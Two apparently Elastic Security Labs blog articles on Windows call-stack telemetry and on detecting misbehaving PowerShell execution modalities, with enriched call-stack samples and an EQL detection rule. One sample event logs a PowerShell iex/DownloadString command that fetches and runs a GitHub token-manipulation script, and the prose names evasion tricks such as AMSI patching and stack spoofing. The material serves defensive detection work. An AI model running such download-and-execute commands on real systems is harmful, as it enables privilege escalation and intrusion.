Elastic Security Labs - Articles by John Uhlmann

Call Stacks: No More Free Passes For Malware

Thu, 12 Jun 2025 00:00:00 GMT

Call stacks provide the who

One of Elastic’s key Windows endpoint telemetry differentiators is call stacks.

Most detections rely on what is happening — and this is often insufficient as most behaviours are dual purpose. With call stacks, we add the fine-grained ability to also determine who is performing the activity. This combination gives us an unparalleled ability to uncover malicious activity. By feeding this deep telemetry to Elastic Defend’s on-host rule engine, we can quickly respond to emerging threats.

Call stacks are a beautiful lie

In computer science, a stack is a last-in, first-out data structure. Similar to a stack of physical items, it is only possible to add or remove the top element. A call stack is a stack that contains information about the currently active subroutine calls.

On x64 hosts, this call stack can only be accurately generated using execution tracing features on the CPU, such as Intel LBR, Intel BTS, Intel AET, Intel IPT, and x64 Architectural LBR. These tracing features were designed for performance profiling and debugging purposes, but can be used in some security scenarios as well. However, what is more generally available is an approximate call stack that is recovered from a thread’s data stack via a mechanism called stack walking.

In the x64 architecture, the “stack pointer register” (rsp) unsurprisingly points to a stack data structure, and there are efficient instructions to read and write the data on this stack. Additionally, the call instruction transfers control to a new subroutine but also saves a return address at the memory address referenced by the stack pointer. A ret instruction will later retrieve this saved address so that execution can return to where it left off. Functions in most programming languages are typically implemented using these two instructions, and both function parameters and local function variables will typically be allocated on this stack for performance. The portion of the stack related to a single function is called a stack frame.

Stack walking is the recovery of just the return addresses from the heterogeneous data stored on the thread stack. Return addresses need to be stored somewhere for control flow — so stack walking co-opts this existing data to approximate a call stack. This is entirely suitable for most debugging and performance profiling scenarios, but slightly less helpful for security auditing. The main issue is that you can’t disassemble backwards. You can always determine the return address for a given call site, but not the converse. The best approach you can take is to check each of the 15 possible preceding instruction lengths and see which disassembles to exactly one call instruction. Even then, all you have recovered is a previous call site — not necessarily the exact preceding call site. This is because most compilers use tail call optimisation to omit unnecessary stack frames. This creates annoying scenarios for security like there being no guarantee that the Win32StartAddress function will be on the stack even though it was called.

So what we usually refer to as a call stack is actually a return address stack.

Malware authors use this ambiguity to lie. They either craft trampoline stack frames through legitimate modules to hide calls originating from malicious code, or they coerce stack walking into predicting different return addresses than those the CPU will execute. Of course, malware has always just been an attempt to lie, and antimalware is just the process of exposing that lie.

“... but at the length truth will out.” - William Shakespeare, The Merchant of Venice, Act 2, Scene 2

Making call stacks beautiful

So far, a stack walk is just a list of numeric memory addresses. To make them useful for analysis we need to enrich them with context. (Note: we don’t currently include kernel stack frames.)

The minimum useful enrichment is to convert these addresses into offsets within modules (e.g. ntdll.dll+0x15c9c4). This would only catch the most egregious malware though — we can go deeper. The most important modules on Windows are those that implement the Native and Win32 APIs. The application binary interface for these APIs requires that the name of each function be included in the Export Directory of the containing module. This is the information that Elastic currently uses to enrich its endpoint call stacks.

A more accurate enrichment could be achieved by using the public symbols (if available) hosted on the vendor’s infrastructure (especially Microsoft) While this method offers deeper fidelity, it comes with higher operational costs and isn’t feasible for our air-gapped customers.

A rule of thumb for Microsoft kernel and native symbols is that the exported interface of each component has a capitalised prefix such as Ldr, Tp or Rtl. Private functions extend this prefix with a p. By default, private functions with external linkage are included in the public symbol table. A very large offset might indicate a very large function, but it could also just indicate an unnamed function that you don’t have symbols for. A general guideline would be to consider any triple-digit and larger offsets in an exported function as likely belonging to another function.

Call Stack	Stack Walk	Stack Walk Modules	Stack Walk Exports (Elastic approach)	Stack Walk Public Symbols
0x7ffb8eb9c9c2 0x12d383f0046 0x7ffb8eb1a9d8 0x7ffb8eb1aaf4 0x7ffb8ea535ff 0x7ffb8da5e8cf 0x7ffb8eaf14eb	0x7ffb8eb9c9c4 0x7ffb8c3c71d6 0x7ffb8eb1a9ed 0x7ffb8eb1aaf9 0x7ffb8ea53604 0x7ffb8da5e8d4 0x7ffb8eaf14f1	ntdll.dll+0x15c9c4 kernelbase.dll+0xc71d6 ntdll.dll+0xda9ed ntdll.dll+0xdaaf9 ntdll.dll+0x13604 kernel32.dll+0x2e8d4 ntdll.dll+0xb14f1	ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlAddRefActivationContext+0x40d ntdll.dll!RtlAddRefActivationContext+0x519 ntdll.dll!RtlAcquireSRWLockExclusive+0x974 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21	ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlTpTimerCallback+0x7d ntdll.dll!TppTimerpExecuteCallback+0xa9 ntdll.dll!TppWorkerThread+0x644 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21

Comparison of Call Stack Enrichment Levels

In the above example, the shellcode at 0x12d383f0000 deliberately used a tail call so that its address wouldn’t appear in the stack walk. This lie-by-omission is apparent even with only the stalk walk. Elastic reports this with the proxy_call heuristic as the malware registered a timer callback function to proxy the call to VirtualProtect from a different thread.

Making call stacks powerful

The call stacks of the system calls that we monitor with Event Tracing for Windows (ETW) have an expected structure. At the bottom of the stack is the thread StartAddress - typically ntdll.dll!RtlUserThreadStart. This is followed by the Win32 API thread entry - kernel32.dll!BaseThreadInitThunk and then the first user module. A user module is application code that is not part of the Win32 (or Native) API. This first user module should match the thread’s Win32StartAddress (unless that function used a tail call). More user modules will follow until the final user module makes a call into a Win32 API that makes a Native API call, which finally results in a system call to the kernel.

From a detection standpoint, the most important module in this call stack is the final user module. Elastic shows this module, including its hash and any code signatures. These details aid in alert triage, but more importantly, they drastically improve the granularity at which we can baseline the behaviours of legitimate software that sometimes behaves like malware. The more accurately we can baseline normal, the harder it is for malware to blend in.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|file.dll|rundll32.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" }, /* Native API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocExNuma+0x62" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocEx+0x16" }, /* Win32 API */
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x160d8b", /* final user module */
        "callsite_trailing_bytes": "488bf0488d4d88e8197ee2ff488bc64883c4685b5e5f415c415d415e415f5dc390909090905541574156415541545756534883ec58488dac2490000000488b71",
        "callsite_leading_bytes": "088b4d38894c2420488bca48894db8498bd0488955b0458bc1448945c4448b4d3044894dc0488d4d88e8e77de2ff488b4db8488b55b0448b45c4448b4dc0ffd6"
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x7b429" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x44a9" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x5f58" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x3bcf" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x6309" }, /* first user module - typically the ETHREAD.Win32StartAddress module */
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" /* Native API - the ETHREAD.StartAddress module */
      }
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.dll",
      "code_signature": [ { "exists": false } ],
      "name": "file.dll",
      "hash": { "sha256": "0240cc89d4a76bafa9dcdccd831a263bf715af53e46cac0b0abca8116122d242" }
    }
  }
}

Sample enriched call stack

Call stack final user module enrichments:

name	The file name of the call_stack_final_user_module. Can also be "Unbacked" indicating private executable memory, or "Undetermined" indicating a suspicious call stack.
path	The file path of the call_stack_final_user_module.
hash.sha256	The sha256 of the call_stack_final_user_module, or the protection_provenance module if any.
code_signature	Code signature of the call_stack_final_user_module, or the protection_provenance module if any.
allocation_private_bytes	The number of bytes in this memory region that are both +X and non-shareable. Non-zero values can indicate code hooking, patching, or hollowing.
protection	The memory protection for the acting region of pages is included if it is not RX. Corresponds to MEMORY_BASIC_INFORMATION.Protect.
protection_provenance	The name of the memory region that caused the last modification of the protection of this page. "Unbacked" may indicate shellcode.
protection_provenance_path	The path of the module that caused the last modification of the protection of this page.
reason	The anomalous call_stack_summary that led to an "Undetermined" protection_provenance.

A quick call stack glossary

When examining call stacks, there are some Native API functions that are helpful to be familiar with. Ken Johnson, now of Microsoft, has provided us with a catalog of NTDLL kernel mode to user mode callbacks to get us started. Seriously, you should pause here and go read that first.

We met RtlUserThreadStart earlier. Both it and its sibling RtlUserFiberStart should only ever appear at the bottom of a call stack. These are the entrypoints for user threads and fibers, respectively. The first instruction on every thread, however, is actually LdrInitializeThunk. After performing the user-mode component of thread initialisation (and process, if required), this function transfers control to the entrypoint via NtContinue, which updates the instruction pointer directly. This means that it does not appear in any future stack walks.

So if you see a call stack that includes LdrInitializeThunk then this means you are at the very start of a thread’s execution. This is where the application compatibility Shim Engine operates, where hook-based security products prefer to install themselves, and where malware tries to gain execution before those other security products. Marcus Hutchins and Guido Miggelenbrink have both written excellent blogs on this topic. This startup race does not exist for security products that utilise kernel ETW for telemetry.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x1bac8" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlAnsiStringToUnicodeString+0x3cb" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitShimEngineDynamic+0x394d" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x1db" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x63" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0xe" }
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false } ],
      "name": "file.exe",
      "hash": { "sha256": "a59a7b56f695845ce185ddc5210bcabce1fff909bac3842c2fb325c60db15df7" }
    }
  }
}

Pre-entrypoint execution example

The next pair is KiUserExceptionDispatcher and KiRaiseUserExceptionDispatcher. The kernel uses the former to pass execution to a registered user-mode structured exception handler after a user-mode exception condition has occurred. The latter also raises an exception, but on behalf of the kernel instead. This second variant is usually only caught by debuggers, including Application Verifier, and helps identify when user-mode code is not sufficiently checking return codes from syscalls. These functions will usually be seen in call stacks related to application-specific crash handling or Windows Error Reporting. However, sometimes malware will use it as a pseudo-breakpoint — for example, if they want to fluctuate memory protections to rehide their shellcode immediately after making a system call.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll|file.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      {
        "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14",
        "protection_provenance": "file.exe", /* another vendor's hooks were unhooked */
        "allocation_private_bytes": 8192
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0xd99c" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlInitializeCriticalSectionAndSpinCount+0x1c6" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlWalkFrameChain+0x1119" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserExceptionDispatcher+0x2e" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x12612" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "file.exe",
      "path": "c:\\users\\user\\desktop\\file.exe",
      "code_signature": [ { "exists": false }],
      "hash":   { "sha256": "0e5a62c0bd9f4596501032700bb528646d6810b16d785498f23ef81c18683c74" }
    }
  }
}

Protection fluctuation via exception handler example

Next is KiUserApcDispatcher, which is used to deliver user APCs. These are one of the favourite tools of malware authors, as Microsoft only provides limited visibility into its use.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|cronos.exe",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x36" }, /* tail call */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!KiUserApcDispatcher+0x2e" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwDelayExecution+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SleepEx+0x9e" },
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.exe+0x107d",
        "allocation_private_bytes": 147456, /* stomped */
        "protection": "RW-", /* fluctuation */
        "protection_provenance": "Undetermined", /* proxied call */
        "callsite_leading_bytes": "010000004152524c8d520141524883ec284150415141baffffffff41525141ba010000004152524c8d520141524883ec284150b9ffffffffba0100000041ffe1",
        "callsite_trailing_bytes": "4883c428c3cccccccccccccccccccccccccccc894c240857b820190000e8a10c0000482be0488b052fd101004833c44889842410190000488d84243014000048"
      }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe"
    }
  }
}

Protection fluctuation via APC example

The Windows window manager is implemented in a kernel-mode device driver (win32k.sys). Mostly. Sometimes the window manager needs to do something from user-mode, and KiUserCallbackDispatcher is the mechanism to achieve that. It’s basically a reverse syscall that targets user32.dll functions. Overwriting an entry in a process’s KernelCallbackTable is an easy way to hijack a GUI thread, so any other module following this call is suspicious.

Knowledge of the purpose of each of these kernel-mode to user-mode entry points greatly assists in determining if a given call stack is natural or if it has been misappropriated to achieve alternative goals.

Making call stacks understandable

To aid understandability, we also tag the event with various process.Ext.api.behaviors that we identify. These behaviours aren’t necessarily malicious, but they highlight aspects that are relevant to alert triage or threat hunting. For call stacks, these include:

native_api	A call was made directly to the Native API rather than the Win32 API.
direct_syscall	A syscall instruction originated outside of the Native API layer.
proxy_call	The call stack may indicate a proxied API call to mask the true source.
shellcode	Second generation executable non-image memory called a sensitive API.
image_indirect_call	An entry in the call stack was preceded by a call to a dynamically resolved function.
image_rop	No call instruction preceded an entry in the call stack.
image_rwx	An entry in the call stack is writable. Code should be read-only.
unbacked_rwx	An entry in the call stack is non-image and writable. Even JIT code should be read-only.
truncated_stack	The call stack seems to be unexpectedly truncated. This may be due to malicious tampering.

In some contexts, these behaviours alone may be sufficient to detect malware.

Spoofing — bypass or liability?

Return address spoofing has been a staple game hacking and malware technique for many, many years. This simple trick allows injected code to borrow the reputation of a legitimate module with few consequences. The goal of deep call stack inspection and behaviour baselines is to stop giving malware this free pass.

Offensive researchers have been assisting this effort by looking into approaches for full call stack spoofing. Most notably:

Spoofing Call Stacks To Confuse EDRs by William Burgess
SilentMoonwalk: Implementing a dynamic Call Stack Spoofer by Alessandro Magnosi, Arash Parsa and Athanasios Tserpelis

SilentMoonwalk, in addition to being superb offensive research, is an excellent example of how lying can get you into twice the amount of trouble — but only if you get caught. Many Defense Evasion techniques rely on security-by-obscurity — and once exposed by researchers, they can become a liability. In this case, the research included advice on the detection opportunities introduced by the evasion attempt.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAlloc+0x48" },
      {
        "symbol_info": "c:\\windows\\system32\\kernelbase.dll!CreatePrivateObjectSecurity+0x31",
        /* 4883c438 stack desync gadget - add rsp 0x38 */
        "callsite_trailing_bytes": "4883c438c3cccccccccccccccccccc48895c241057498bd8448bd2488bf94885c90f84660609004885db0f845d060900418bd14585c97411418bc14803c383ea",
        "callsite_leading_bytes": "cccccccccccccccccccccccccccccc4883ec38488b4424684889442428488b442460488944242048ff15d9b21b000f1f44000085c00f8830300900b801000000"
      },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!Internal_EnumSystemLocales+0x406" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!SystemTimeToTzSpecificLocalTimeEx+0x2d1" },
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!WaitForMultipleObjectsEx+0x982" },
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined", /* gadget module resulted in suspicious call stack */
      "reason": "ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll"
    }
  }
}

SilentMoonwalk call stack example

A standard technique for unearthing hidden artifacts is to enumerate them using multiple techniques and compare the results for discrepancies. This is how RootkitRevealer works. This approach was also used in Get-InjectedThreadEx.exe, which climbs up the thread stack as well as walking down it.

In certain circumstances, we may be able to recover a call stack in two ways. If there are discrepancies, then you will see the less reliable call stack emitted as call_stack_summary_original.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll",
    "call_stack_summary_original": "ntdll.dll|kernelbase.dll|version.dll|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtContinue+0x12" },
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x13" }
    ],
    "call_stack_final_user_module": {
      "name": "Undetermined",
      "reason": "ntdll.dll"
    }
  }
}

Call Stack summary original example

Call Stacks are for everyone

By default you will only find call stacks in our alerts, but this is configurable through advanced policy.

events.callstacks.emit_in_events	If set, call stacks will be included in regular events where they are collected. Otherwise, they are only included in events that trigger behavioral protection rules. Note that setting this may significantly increase data volumes. Default: false

Further insights into Windows call stacks is available in the following Elastic Security Labs articles:

Misbehaving Modalities: Detecting Tools, Not Techniques

Thu, 15 May 2025 00:00:00 GMT

What is Execution Modality?

Jared Atkinson, Chief Strategist at SpecterOps and prolific writer on security strategy, recently introduced the very useful concept of Execution Modality to help us reason about malware techniques, and how to robustly detect them. In short, Execution Modality describes how a malicious behaviour is executed, rather than simply defining what the behaviour does.

For example, the behaviour of interest might be Windows service creation, and the modality might be either a system utility (such as `sc.exe`), a PowerShell script, or shellcode that uses indirect syscalls to directly write to the service configuration in the Windows Registry.

Atkinson outlined that if your goal is to detect a specific technique, you want to ensure that your collection is as close as possible to the operating system’s source of truth and eliminate any modality assumptions.

Case Study: service creation modalities

In the typical Service creation scenario within the Windows OS, an installer calls sc.exe create which makes an RCreateService RPC call to an endpoint in the Service Control Manager (SCM, aka services.exe) which then makes syscalls to the kernel-mode configuration manager to update the database of installed services in the registry. This is later flushed to disk and restored from disk on boot.

This means that the source of truth for a running system is the registry (though hives are flushed to disk and can be tampered with offline).

In a threat hunting scenario, we could easily detect anomalous sc.exe command lines - but a different tool might make Service Control RPC calls directly.

If we were processing our threat data stringently, we could also detect anomalous Service Control RPC calls, but a different tool might make syscalls (in)directly or use another service, such as the Remote Registry, to update the service database indirectly.

In other words, some of these execution modalities bypass traditional telemetry such as Windows event logs.

So how do we monitor changes to the configuration manager? We can’t robustly monitor syscalls directly due to Kernel Patch Protection, but Microsoft has provided configuration manager callbacks as an alternative. This is where Elastic has focused our service creation detection efforts - as close to the operating system’s source of truth as possible.

The trade-off for this low-level visibility, however, is a potential reduction in context. For example, due to Windows architectural decisions, security vendors do not know which RPC client is requesting the creation of a registry key in the services database. Microsoft only supports querying RPC client details from a user-mode RPC service.

Starting with Windows 10 21H1, Microsoft began including RPC client details in the service creation event log. This event, while less robust, sometimes provides additional context that might assist in determining the source of an anomalous behaviour.

Due to their history of abuse, some modalities have been extended with extra logging - one important example is PowerShell. This allows certain techniques to be detected with high precision - but only when executed within PowerShell. It is important not to conflate having detection coverage of a technique in PowerShell with coverage of that technique in general. This nuance is important when estimating MITRE ATT&CK coverage. As red teams routinely demonstrate, having 100% technique coverage - but only for PowerShell - is close to 0% real-world coverage.

Summiting the Pyramid (STP) is a related analytic scoring methodology from MITRE. It makes a similar conclusion about the fragility of PowerShell scriptblock-based detections and assigns such rules a low robustness score.

High-level telemetry sources, such as Process Creation logging and PowerShell logging, are extremely brittle at detecting most techniques as they cover very few modalities. At best, they assist in detecting the most egregious Living off the Land (LotL) abuses.

Atkinson made the following astute observation in the example used to motivate the discussion:

An important point is that our higher-order objective in detection is behavior-based, not modality-based. Therefore, we should be interested in detecting Session Enumeration (behavior-focused), not Session Enumeration in PowerShell (modality-focused).

Sometimes that is only half of the story though. Sometimes detecting that the tool itself is out of context is more efficient than detecting the technique. Sometimes the execution modality itself is anomalous.

An alternative to detecting a known technique is to detect a misbehaving modality.

Call stacks divulge Modality

One of Elastic’s strengths is the inclusion of call stacks in the majority of our events. This level of call provenance detail greatly assists in determining whether a given activity is malicious or benign. Call stack summaries are often sufficient to divulge the execution modality - the runtimes for PowerShell, .NET, RPC, WMI, VBA, Lua, Python, and Java all leave traces in the call stack.

Some of our first call stack-based rules were for Office VBA macros (vbe7.dll) spawning child processes or dropping files, and for unbacked executable memory loading the .NET runtime. In both of these examples, the technique itself was largely benign; it was the modality of the behaviour that was predominantly anomalous.

So can we flip the typical behaviour-focused detection approach to a modality-focused one? For example, can we detect solely on the use of any dual-purpose API call originating from PowerShell?

Using call stacks, Elastic is able to differentiate between the API calls that originate from PowerShell scripts and those that come from the PowerShell or .NET runtimes.

Using Threat-Intelligence ETW as an approximation for a dual-purpose API, our rule for “Suspicious API Call from a PowerShell Script” was quite effective.

api where
event.provider == "Microsoft-Windows-Threat-Intelligence" and
process.name in~ ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and

/* PowerShell Script JIT - and incidental .NET assemblies */
process.thread.Ext.call_stack_final_user_module.name == "Unbacked" and
process.thread.Ext.call_stack_final_user_module.protection_provenance in ("clr.dll", "mscorwks.dll", "coreclr.dll") and

/* filesystem enumeration activity */
not process.Ext.api.summary like "IoCreateDevice( \\FileSystem\\*, (null) )" and

/* exclude nop operations */
not (process.Ext.api.name == "VirtualProtect" and process.Ext.api.parameters.protection == "RWX" and process.Ext.api.parameters.protection_old == "RWX") and

/* Citrix GPO Scripts */
not (process.parent.executable : "C:\\Windows\\System32\\gpscript.exe" and
  process.Ext.api.summary in ("VirtualProtect( Unbacked, 0x10, RWX, RW- )", "WriteProcessMemory( Self, Unbacked, 0x10 )", "WriteProcessMemory( Self, Data, 0x10 )")) and

/* cybersecurity tools */
not (process.Ext.api.name == "VirtualAlloc" and process.parent.executable : ("C:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe", "C:\\Program Files\\Velociraptor\\Velociraptor.exe")) and

/* module listing */
not (process.Ext.api.name in ("EnumProcessModules", "GetModuleInformation", "K32GetModuleBaseNameW", "K32GetModuleFileNameExW") and
  process.parent.executable : ("*\\Lenovo\\*\\BGHelper.exe", "*\\Octopus\\*\\Calamari.exe")) and

/* WPM triggers multiple times at process creation */
not (process.Ext.api.name == "WriteProcessMemory" and
     process.Ext.api.metadata.target_address_name in ("PEB", "PEB32", "ProcessStartupInfo", "Data") and
     _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info like ("?:\\windows\\*\\kernelbase.dll!CreateProcess*", "Unknown")))

Even though we don’t need to use the brittle PowerShell AMSI logging for detection, we can still provide this detail in the event as context as it assists with triage. This modality-based approach even detects common PowerShell defence evasion tradecraft such as:

ntdll unhooking
AMSI patching
user-mode ETW patching

{
 "event": {
  "provider": "Microsoft-Windows-Threat-Intelligence",
  "created": "2025-01-29T18:27:09.4386902Z",
  "kind": "event",
  "category": "api",
  "type": "change",
  "outcome": "unknown"
 },
 "message": "Endpoint API event - VirtualProtect",
 "process": {
  "parent": {
   "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
  },
  "name": "powershell.exe",
  "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "code_signature": {
   "trusted": true,
   "subject_name": "Microsoft Windows",
   "exists": true,
   "status": "trusted"
  },
  "command_line": "\"powershell.exe\" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
  "pid": 21908,
  "Ext": {
   "api": {
    "summary": "VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )",
    "metadata": {
     "target_address_path": "c:\\windows\\system32\\kernel32.dll",
     "amsi_logs": [
      {
       "entries": [
        "& {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "{iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "function Get-WinLogonTokenSystem\n{\nfunction _10001011000101101\n{\n  [CmdletBinding()]\n  Param(\n [Parameter(Position = 0, Mandatory = $true)]\n [ValidateNotNullOrEmpty()]\n [Byte[]]\n ${_00110111011010011},\n ...",
        "{[Char] $_}",
        "{\n [CmdletBinding()]\n Param(\n   [Parameter(Position = 0, Mandatory = $true)]\n   [Byte[]]\n   ${_00110111011010011},\n   [Parameter(Position = 1, Mandatory = $true)]\n   [String]\n   ${_10100110010101100},\n ...",
        "{ $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }"
       ],
       "type": "PowerShell"
      }
     ],
     "target_address_name": "kernel32.dll!FatalExit",
     "amsi_filenames": [
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1",
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1"
     ]
    },
    "behaviors": [
     "sensitive_api",
     "hollow_image",
     "unbacked_rwx"
    ],
    "name": "VirtualProtect",
    "parameters": {
     "address": 140727652261072,
     "size": 33,
     "protection_old": "R-X",
     "protection": "RWX"
    }
   },
   "code_signature": [
    {
     "trusted": true,
     "subject_name": "Microsoft Windows",
     "exists": true,
     "status": "trusted"
    }
   ],
   "token": {
    "integrity_level_name": "high"
   }
  },
  "thread": {
   "Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|Unbacked",
    "call_stack_contains_unbacked": true,
    "call_stack": [
     {
      "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14"
     },
     {
      "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b"
     },
     {
      "symbol_info": "Unbacked+0x3b5c",
      "protection_provenance": "clr.dll",
      "callsite_trailing_bytes": "41c644240c01833dab99f35f007406ff15b7b6f25f8bf0e85883755f85f60f95c00fb6c00fb6c041c644240c01488b55884989542410488d65c85b5e5f415c41",
      "protection": "RWX",
      "callsite_leading_bytes": "df765f4d63f64c897dc0488d55b8488bcee8ee6da95f4d8bcf488bcf488bd34d8bc64533db4c8b55b84c8955904c8d150c0000004c8955a841c644240c00ffd0"
     }
    ],
    "call_stack_final_user_module": {
     "code_signature": [
      {
       "trusted": true,
       "subject_name": "Microsoft Corporation",
       "exists": true,
       "status": "trusted"
      }
     ],
     "protection_provenance_path": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll",
     "name": "Unbacked",
     "protection_provenance": "clr.dll",
     "protection": "RWX",
     "hash": {
      "sha256": "707564fc98c58247d088183731c2e5a0f51923c6d9a94646b0f2158eb5704df4"
     }
    }
   },
   "id": 17260
  }
 },
 "user": {
  "id": "S-1-5-21-47396387-2833971351-1621354421-500"
 }
}

Robustness assessment

Using the Summiting the Pyramid analytic scoring methodology we can compare our PowerShell modality-based detection rule with traditional PowerShell

	Application (A)	Kernel mode (K)
Core to (Sub) Technique (5)		[ best ] Kernel ETW-based PowerShell modality detections
Core to Part of (Sub-) Technique (4)
Core to Pre-Existing Tool (3)
Core to Adversary-brought Tool (2)	AMSI and ScriptBlock-based PowerShell content detections
Ephemeral (1)	[ worst ]

PowerShell Analytic Scoring using Summiting the Pyramid

As noted earlier, most PowerShell detections receive a low 2A robustness score using the STP scale. This is in stark contrast to our PowerShell misbehaving modality rule which receives the highest possible 5K score (where appropriate kernel telemetry is available from Microsoft).

One caveat is that an STP analytic score does not yet include any measure for the setup and maintenance costs of a rule. This could potentially be approximated by the size of the known false positive software list for a given rule - though most open rule sets typically do not include this information. We do and, in our rule’s case, the false positives observed to date have been extremely manageable.

Can call stacks be spoofed though?

Yes - and slightly no. Our call stacks are all collected inline in the kernel, but the user-mode call stack itself resides in user-mode memory that the malware may control. This means that, if malware has achieved arbitrary execution, then it can control the stack frames that we see.

Sure, dual-purpose API calls from private memory are suspicious, but sometimes trying to hide your private memory is even more suspicious. This can take the form of:

Calls from overwritten modules.
Return addresses without a preceding call instruction.
Calls proxied via other modules.

Call stack control alone may not be enough. In order to truly bypass some of our call stack detections, an attacker must craft a call stack that entirely blends with normal activity. In some environments this can be baselined by security teams with high accuracy; making it hard for the attackers to remain undetected. Based on our in-house research, and with the assistance of red team tool developers, we are also continually improving our out-of-the-box detections.

